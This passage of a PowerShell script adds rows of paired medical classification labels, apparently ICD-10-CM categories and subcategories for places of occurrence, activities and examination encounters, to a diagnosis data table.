the external cause","Basketball court as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic court as the place of occurrence of the external cause","Squash court as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic court as the place of occurrence of the external cause","Tennis court as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic court as the place of occurrence of the external cause","Other athletic court as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic field as the place of occurrence of the external cause","Baseball field as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic field as the place of occurrence of the external cause","Football field as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic field as the place of occurrence of the external cause","Soccer field as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Athletic field as the place of occurrence of the external cause","Other athletic field as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Skating rink as the place of occurrence of the external cause","Ice skating rink (indoor) (outdoor) as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Skating rink as the place of occurrence of the external cause","Roller skating rink as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Swimming pool (public) as the place of occurrence of the external cause","Swimming pool (public) as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified sports and athletic area as the place of occurrence of the external cause","Other specified sports and athletic area as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Street and highway as the place of occurrence of the external cause","Unspecified street and highway as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Street and highway as the place of occurrence of the external cause","Interstate highway as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Street and highway as the place of occurrence of the external cause","Parkway as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Street and highway as the place of occurrence of the external cause","State road as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Street and highway as the place of occurrence of the external cause","Local residential or business street as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Street and highway as the place of occurrence of the external cause","Exit ramp or entrance ramp of street or highway as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other paved roadways as the place of occurrence of the external cause","Sidewalk as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other paved roadways as the place of occurrence of the external cause","Parking lot as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other paved roadways as the place of occurrence of the external cause","Bike path as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other paved roadways as the place of occurrence of the external cause","Other paved roadways as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Private commercial establishments as the place of occurrence of the external cause","Bank as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Private commercial establishments as the place of occurrence of the external cause","Restaurant or cafe as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Private commercial establishments as the place of occurrence of the external cause","Supermarket, store or market as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Private commercial establishments as the place of occurrence of the external cause","Shop (commercial) as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Service areas as the place of occurrence of the external cause","Airport as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Service areas as the place of occurrence of the external cause","Bus station as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Service areas as the place of occurrence of the external cause","Railway station as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Service areas as the place of occurrence of the external cause","Highway rest stop as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Service areas as the place of occurrence of the external cause","Gas station as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Ambulatory health services establishments as the place of occurrence of the external cause","Ambulatory surgery center as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Ambulatory health services establishments as the place of occurrence of the external cause","Health care provider office as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Ambulatory health services establishments as the place of occurrence of the external cause","Urgent care center as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Ambulatory health services establishments as the place of occurrence of the external cause","Other ambulatory health services establishments as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other trade areas as the place of occurrence of the external cause","Other trade areas as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Industrial and construction area as the place of occurrence of the external cause","Building [any] under construction as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Industrial and construction area as the place of occurrence of the external cause","Dock or shipyard as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Industrial and construction area as the place of occurrence of the external cause","Factory as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Industrial and construction area as the place of occurrence of the external cause","Mine or pit as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Industrial and construction area as the place of occurrence of the external cause","Oil rig as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Industrial and construction area as the place of occurrence of the external cause","Other specified industrial and construction area as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Farm as the place of occurrence of the external cause","Barn as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Farm as the place of occurrence of the external cause","Chicken coop as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Farm as the place of occurrence of the external cause","Farm field as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Farm as the place of occurrence of the external cause","Orchard as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Farm as the place of occurrence of the external cause","Other farm location as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Car as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Bus as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Truck as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Airplane as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Boat as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Train as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Subway car as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Transport vehicle as the place of occurrence of the external cause","Other transport vehicle as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Wilderness area","Desert as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Wilderness area","Forest as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Wilderness area","Other wilderness area as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Recreation area as the place of occurrence of the external cause","Public park as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Recreation area as the place of occurrence of the external cause","Amusement park as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Recreation area as the place of occurrence of the external cause","Beach as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Recreation area as the place of occurrence of the external cause","Campsite as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Recreation area as the place of occurrence of the external cause","Zoological garden (Zoo) as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Recreation area as the place of occurrence of the external cause","Other recreation area as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Military training ground as the place of occurrence of the external cause","Military training ground as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Railroad track as the place of occurrence of the external cause","Railroad track as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Slaughter house as the place of occurrence of the external cause","Slaughter house as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Other specified places as the place of occurrence of the external cause","Other specified places as the place of occurrence of the external cause") + $null = $DiagnosisList.Rows.Add("Unspecified place or not applicable","Unspecified place or not applicable") + $null = $DiagnosisList.Rows.Add("Activities involving walking and running","Activity, walking, marching and hiking") + $null = $DiagnosisList.Rows.Add("Activities involving walking and running","Activity, running") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, swimming") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, springboard and platform diving") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, water polo") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, water aerobics and water exercise") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, underwater diving and snorkeling") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, rowing, canoeing, kayaking, rafting and tubing") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, water skiing and wake boarding") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, surfing, windsurfing and boogie boarding") + $null = $DiagnosisList.Rows.Add("Activities involving water and water craft","Activity, other involving water and watercraft") + $null = $DiagnosisList.Rows.Add("Activities involving ice and snow","Activity, ice skating") + $null = $DiagnosisList.Rows.Add("Activities involving ice and snow","Activity, ice hockey") + $null = $DiagnosisList.Rows.Add("Activities involving ice and snow","Activity, snow (alpine) (downhill) skiing, snow boarding, sledding, tobogganing and snow tubing") + $null = $DiagnosisList.Rows.Add("Activities involving ice and snow","Activity, cross country skiing") + $null = $DiagnosisList.Rows.Add("Activities involving ice and snow","Activity, other involving ice and snow") + $null = $DiagnosisList.Rows.Add("Activities involving climbing, rappelling and jumping off","Activity, mountain climbing, rock climbing and wall climbing") + $null = $DiagnosisList.Rows.Add("Activities involving climbing, rappelling and jumping off","Activity, rappelling") + $null = $DiagnosisList.Rows.Add("Activities involving climbing, rappelling and jumping off","Activity, BASE jumping") + $null = $DiagnosisList.Rows.Add("Activities involving climbing, rappelling and jumping off","Activity, bungee jumping") + $null = $DiagnosisList.Rows.Add("Activities involving climbing, rappelling and jumping off","Activity, hang gliding") + $null = $DiagnosisList.Rows.Add("Activities involving climbing, rappelling and jumping off","Activity, other involving climbing, rappelling and jumping off") + $null = $DiagnosisList.Rows.Add("Activities involving dancing and other rhythmic movement","Activity, dancing") + $null = $DiagnosisList.Rows.Add("Activities involving dancing and other rhythmic movement","Activity, yoga") + $null = $DiagnosisList.Rows.Add("Activities involving dancing and other rhythmic movement","Activity, gymnastics") + $null = $DiagnosisList.Rows.Add("Activities involving dancing and other rhythmic movement","Activity, trampolining") + $null = $DiagnosisList.Rows.Add("Activities involving dancing and other rhythmic movement","Activity, cheerleading") + $null = $DiagnosisList.Rows.Add("Activities involving dancing and other rhythmic movement","Activity, other involving dancing and other rhythmic movements") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, roller skating (inline) and skateboarding") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, horseback riding") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, golf") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, bowling") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, bike riding") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, jumping rope") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, non-running track and field events") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played individually","Activity, other involving other sports and athletics played individually") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, american tackle football") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, american flag or touch football") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, rugby") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, baseball") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, lacrosse and field hockey") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, soccer") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, basketball") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, volleyball (beach) (court)") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, physical games generally associated with school recess, summer camp and children") + $null = $DiagnosisList.Rows.Add("Activities involving other sports and athletics played as a team or group","Activity, other involving other sports and athletics played as a team or group") + $null = $DiagnosisList.Rows.Add("Activities involving other specified sports and athletics","Activity, boxing") + $null = $DiagnosisList.Rows.Add("Activities involving other specified sports and athletics","Activity, wrestling") + $null = $DiagnosisList.Rows.Add("Activities involving other specified sports and athletics","Activity, racquet and hand sports") + $null = $DiagnosisList.Rows.Add("Activities involving other specified sports and athletics","Activity, frisbee") + $null = $DiagnosisList.Rows.Add("Activities involving other specified sports and athletics","Activity, martial arts") + $null = $DiagnosisList.Rows.Add("Activities involving other specified sports and athletics","Activity, other specified sports and athletics") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, exercise machines primarily for cardiorespiratory conditioning") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, calisthenics") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, aerobic and step exercise") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, circuit training") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, obstacle course") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, grass drills") + $null = $DiagnosisList.Rows.Add("Activities involving other cardiorespiratory exercise","Activity, other involving cardiorespiratory exercise") + $null = $DiagnosisList.Rows.Add("Activities involving other muscle strengthening exercises","Activity, exercise machines primarily for muscle strengthening") + $null = $DiagnosisList.Rows.Add("Activities involving other muscle strengthening exercises","Activity, push-ups, pull-ups, sit-ups") + $null = $DiagnosisList.Rows.Add("Activities involving other muscle strengthening exercises","Activity, free weights") + $null = $DiagnosisList.Rows.Add("Activities involving other muscle strengthening exercises","Activity, pilates") + $null = $DiagnosisList.Rows.Add("Activities involving other muscle strengthening exercises","Activity, other involving muscle strengthening exercises") + $null = $DiagnosisList.Rows.Add("Activities involving computer technology and electronic devices","Activity, computer keyboarding") + $null = $DiagnosisList.Rows.Add("Activities involving computer technology and electronic devices","Activity, hand held interactive electronic device") + $null = $DiagnosisList.Rows.Add("Activities involving computer technology and electronic devices","Activity, other involving computer technology and electronic devices") + $null = $DiagnosisList.Rows.Add("Activities involving arts and handcrafts","Activity, knitting and crocheting") + $null = $DiagnosisList.Rows.Add("Activities involving arts and handcrafts","Activity, sewing") + $null = $DiagnosisList.Rows.Add("Activities involving arts and handcrafts","Activity, furniture building and finishing") + $null = $DiagnosisList.Rows.Add("Activities involving arts and handcrafts","Activity, other involving arts and handcrafts") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, personal bathing and showering") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, laundry") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, vacuuming") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, ironing") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, floor mopping and cleaning") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, residential relocation") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, other personal hygiene") + $null = $DiagnosisList.Rows.Add("Activities involving personal hygiene and interior property and clothing maintenance","Activity, other interior property and clothing maintenance") + $null = $DiagnosisList.Rows.Add("Activities involving caregiving","Activity, caregiving, bathing") + $null = $DiagnosisList.Rows.Add("Activities involving caregiving","Activity, caregiving, lifting") + $null = $DiagnosisList.Rows.Add("Activities involving caregiving","Activity, other caregiving") + $null = $DiagnosisList.Rows.Add("Activities involving food preparation, cooking and grilling","Activity, food preparation and clean up") + $null = $DiagnosisList.Rows.Add("Activities involving food preparation, cooking and grilling","Activity, grilling and smoking food") + $null = $DiagnosisList.Rows.Add("Activities involving food preparation, cooking and grilling","Activity, cooking and baking") + $null = $DiagnosisList.Rows.Add("Activities involving food preparation, cooking and grilling","Activity, other involving cooking and grilling") + $null = $DiagnosisList.Rows.Add("Activities involving exterior property and land maintenance, building and construction","Activity, digging, shoveling and raking") + $null = $DiagnosisList.Rows.Add("Activities involving exterior property and land maintenance, building and construction","Activity, gardening and landscaping") + $null = $DiagnosisList.Rows.Add("Activities involving exterior property and land maintenance, building and construction","Activity, building and construction") + $null = $DiagnosisList.Rows.Add("Activities involving exterior property and land maintenance, building and construction","Activity, other involving exterior property and land maintenance, building and construction") + $null = $DiagnosisList.Rows.Add("Activities involving roller coasters and other types of external motion","Activity, roller coaster riding") + $null = $DiagnosisList.Rows.Add("Activities involving roller coasters and other types of external motion","Activity, other involving external motion") + $null = $DiagnosisList.Rows.Add("Activities involving playing musical instrument","Activity, piano playing") + $null = $DiagnosisList.Rows.Add("Activities involving playing musical instrument","Activity, drum and other percussion instrument playing") + $null = $DiagnosisList.Rows.Add("Activities involving playing musical instrument","Activity, string instrument playing") + $null = $DiagnosisList.Rows.Add("Activities involving playing musical instrument","Activity, winds and brass instrument playing") + $null = $DiagnosisList.Rows.Add("Activities involving animal care","Activity, walking an animal") + $null = $DiagnosisList.Rows.Add("Activities involving animal care","Activity, milking an animal") + $null = $DiagnosisList.Rows.Add("Activities involving animal care","Activity, grooming and shearing an animal") + $null = $DiagnosisList.Rows.Add("Activities involving animal care","Activity, other involving animal care") + $null = $DiagnosisList.Rows.Add("Activities, other specified","Activity, refereeing a sports activity") + $null = $DiagnosisList.Rows.Add("Activities, other specified","Activity, spectator at an event") + $null = $DiagnosisList.Rows.Add("Activities, other specified","Activity, rough housing and horseplay") + $null = $DiagnosisList.Rows.Add("Activities, other specified","Activity, sleeping") + $null = $DiagnosisList.Rows.Add("Activities, other specified","Activity, choking game") + $null = $DiagnosisList.Rows.Add("Activities, other specified","Activity, other specified") + $null = $DiagnosisList.Rows.Add("Activity, unspecified","Activity, unspecified") + $null = $DiagnosisList.Rows.Add("Nosocomial condition","Nosocomial condition") + $null = $DiagnosisList.Rows.Add("External cause status","Civilian activity done for income or pay") + $null = $DiagnosisList.Rows.Add("External cause status","Military activity") + $null = $DiagnosisList.Rows.Add("External cause status","Volunteer activity") + $null = $DiagnosisList.Rows.Add("External cause status","Other external cause status") + $null = $DiagnosisList.Rows.Add("External cause status","Unspecified external cause status") + $null = $DiagnosisList.Rows.Add("Encounter for general adult medical examination","Encounter for general adult medical examination without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for general adult medical examination","Encounter for general adult medical examination with abnormal findings") + $null = $DiagnosisList.Rows.Add("Newborn health examination","Health examination for newborn under 8 days old") + $null = $DiagnosisList.Rows.Add("Newborn health examination","Health examination for newborn 8 to 28 days old") + $null = $DiagnosisList.Rows.Add("Encounter for routine child health examination","Encounter for routine child health examination with abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for routine child health examination","Encounter for routine child health examination without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination for period of rapid growth in childhood","Encounter for examination for period of rapid growth in childhood") + $null = $DiagnosisList.Rows.Add("Encounter for examination for adolescent development state","Encounter for examination for adolescent development state") + $null = $DiagnosisList.Rows.Add("Encounter for examination of potential donor of organ and tissue","Encounter for examination of potential donor of organ and tissue") + $null = $DiagnosisList.Rows.Add("Encounter for examination for normal comparison and control in clinical research program","Encounter for examination for normal comparison and control in clinical research program") + $null = $DiagnosisList.Rows.Add("Encounter for examination for period of delayed growth in childhood","Encounter for examination for period of delayed growth in childhood without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination for period of delayed growth in childhood","Encounter for examination for period of delayed growth in childhood with abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for other general examination","Encounter for other general examination") + $null = $DiagnosisList.Rows.Add("Encounter for examination of eyes and vision","Encounter for examination of eyes and vision without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination of eyes and vision","Encounter for examination of eyes and vision with abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination of ears and hearing","Encounter for examination of ears and hearing without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination of ears and hearing with abnormal findings","Encounter for hearing examination following failed hearing screening") + $null = $DiagnosisList.Rows.Add("Encounter for examination of ears and hearing with abnormal findings","Encounter for examination of ears and hearing with other abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for hearing conservation and treatment","Encounter for hearing conservation and treatment") + $null = $DiagnosisList.Rows.Add("Encounter for dental examination and cleaning","Encounter for dental examination and cleaning without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for dental examination and cleaning","Encounter for dental examination and cleaning with abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination of blood pressure","Encounter for examination of blood pressure without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for examination of blood pressure","Encounter for examination of blood pressure with abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for routine gynecological examination","Encounter for gynecological examination (general) (routine) with abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for routine gynecological examination","Encounter for gynecological examination (general) (routine) without abnormal findings") + $null = $DiagnosisList.Rows.Add("Encounter for cervical smear to confirm findings of recent normal smear following initial abnormal smear","Encounter for cervical smear to confirm findings of recent normal smear following initial abnormal smear") + $null = $DiagnosisList.Rows.Add("Encounter for preprocedural examinations","Encounter for preprocedural cardiovascular examination") + $null = $DiagnosisList.Rows.Add("Encounter for preprocedural examinations","Encounter for preprocedural respiratory examination") + $null = $DiagnosisList.Rows.Add("Encounter for preprocedural examinations","Encounter for preprocedural laboratory examination") + $null = $DiagnosisList.Rows.Add("Encounter for preprocedural examinations","Encounter for other preprocedural examination") + $null = $DiagnosisList.Rows.Add("Encounter for allergy testing","Encounter for allergy testing") + $null = $DiagnosisList.Rows.Add("Encounter for blood typing","Encounter for blood typing") + $null = $DiagnosisList.Rows.Add("Encounter for antibody response examination","Encounter for antibody response examination") + $null = $DiagnosisList.Rows.Add("Encounter for other specified special examinations","Encounter for other specified special examinations") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for examination for admission to educational institution") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for pre-employment examination") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for examination for admission to residential institution") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for examination for recruitment to armed forces") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for examination for driving license") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for examination for participation in sport") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examination","Encounter for examination for insurance purposes") + $null = $DiagnosisList.Rows.Add("Encounter for issue of medical certificate","Encounter for disability determination") + $null = $DiagnosisList.Rows.Add("Encounter for issue of medical certificate","Encounter for issue of other medical certificate") + $null = $DiagnosisList.Rows.Add("Encounter for other administrative examinations","Encounter for paternity testing") + $null = $DiagnosisList.Rows.Add("Encounter for other administrative examinations","Encounter for adoption services") + $null = $DiagnosisList.Rows.Add("Encounter for other administrative examinations","Encounter for blood-alcohol and blood-drug test") + $null = $DiagnosisList.Rows.Add("Encounter for other administrative examinations","Encounter for other administrative examinations") + $null = $DiagnosisList.Rows.Add("Encounter for administrative examinations, unspecified","Encounter for administrative examinations, unspecified") + $null = $DiagnosisList.Rows.Add("Encounter for medical observation for suspected diseases and conditions ruled out","Encounter for observation for suspected toxic effect from ingested substance ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for suspected maternal and fetal conditions ruled out","Encounter for suspected problem with amniotic cavity and membrane ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for suspected maternal and fetal conditions ruled out","Encounter for suspected placental problem ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for suspected maternal and fetal conditions ruled out","Encounter for suspected fetal anomaly ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for suspected maternal and fetal conditions ruled out","Encounter for suspected problem with fetal growth ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for suspected maternal and fetal conditions ruled out","Encounter for suspected cervical shortening ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for suspected maternal and fetal conditions ruled out","Encounter for other suspected maternal and fetal conditions ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for observation for suspected exposure to biological agents ruled out","Encounter for observation for suspected exposure to anthrax ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for observation for suspected exposure to biological agents ruled out","Encounter for observation for suspected exposure to other biological agents ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for observation for other suspected diseases and conditions ruled out","Encounter for observation for other suspected diseases and conditions ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation for other reasons","Encounter for examination and observation following transport accident") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation for other reasons","Encounter for examination and observation following work accident") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation for other reasons","Encounter for examination and observation following other accident") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation following alleged rape","Encounter for examination and observation following alleged adult rape") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation following alleged rape","Encounter for examination and observation following alleged child rape") + $null = $DiagnosisList.Rows.Add("Encounter for general psychiatric examination, requested by authority","Encounter for general psychiatric examination, requested by authority") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation following alleged physical abuse","Encounter for examination and observation following alleged adult physical abuse") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation following alleged physical abuse","Encounter for examination and observation following alleged child physical abuse") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation for other specified reasons","Encounter for examination and observation for other specified reasons") + $null = $DiagnosisList.Rows.Add("Encounter for examination and observation for unspecified reason","Encounter for examination and observation for unspecified reason") + $null = $DiagnosisList.Rows.Add("Encounter for observation and evaluation of newborn for suspected diseases and conditions ruled out","Observation and evaluation of newborn for suspected cardiac condition ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for observation and evaluation of newborn for suspected diseases and conditions ruled out","Observation and evaluation of newborn for suspected infectious condition ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for observation and evaluation of newborn for suspected diseases and conditions ruled out","Observation and evaluation of newborn for suspected neurological condition ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for observation and evaluation of newborn for suspected diseases and conditions ruled out","Observation and evaluation of newborn for suspected respiratory condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected genetic, metabolic or immunologic condition ruled out","Observation and evaluation of newborn for suspected genetic condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected genetic, metabolic or immunologic condition ruled out","Observation and evaluation of newborn for suspected metabolic condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected genetic, metabolic or immunologic condition ruled out","Observation and evaluation of newborn for suspected immunologic condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected gastrointestinal condition ruled out","Observation and evaluation of newborn for suspected gastrointestinal condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected genitourinary condition ruled out","Observation and evaluation of newborn for suspected genitourinary condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected skin, subcutaneous, musculoskeletal and connective tissue condition ruled out","Observation and evaluation of newborn for suspected skin and subcutaneous tissue condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected skin, subcutaneous, musculoskeletal and connective tissue condition ruled out","Observation and evaluation of newborn for suspected musculoskeletal condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for suspected skin, subcutaneous, musculoskeletal and connective tissue condition ruled out","Observation and evaluation of newborn for suspected connective tissue condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for other specified suspected condition ruled out","Observation and evaluation of newborn for other specified suspected condition ruled out") + $null = $DiagnosisList.Rows.Add("Observation and evaluation of newborn for unspecified suspected condition ruled out","Observation and evaluation of newborn for unspecified suspected condition ruled out") + $null = $DiagnosisList.Rows.Add("Encounter for follow-up examination after completed treatment for malignant neoplasm","Encounter for follow-up examination after completed treatment for malignant neoplasm") + $null = $DiagnosisList.Rows.Add("Encounter for follow-up examination after completed treatment for conditions other than malignant neoplasm","Encounter for follow-up examination after completed treatment for conditions other than malignant neoplasm") + $null = $DiagnosisList.Rows.Add("Encounter for screening for infectious and parasitic diseases","Encounter for screening for intestinal infectious diseases") + $null = $DiagnosisList.Rows.Add("Encounter for screening for infectious and parasitic diseases","Encounter for screening for respiratory tuberculosis") + $null = $DiagnosisList.Rows.Add("Encounter for screening for infectious and parasitic diseases","Encounter for screening for other bacterial diseases") + $null = $DiagnosisList.Rows.Add("Encounter for screening for infectious and parasitic diseases","Encounter for screening for infections with a predominantly sexual mode of transmission") + $null = $DiagnosisList.Rows.Add("Encounter for screening for infectious and parasitic diseases","Encounter for screening for human immunodeficiency virus [HIV]") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other viral diseases","Encounter for screening for human papillomavirus (HPV)") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other viral diseases","Encounter for screening for other viral diseases") + $null = $DiagnosisList.Rows.Add("Encounter for screening for other protozoal diseases and helminthiases","Encounter for screening for other protozoal diseases and helminthiases") + $null = 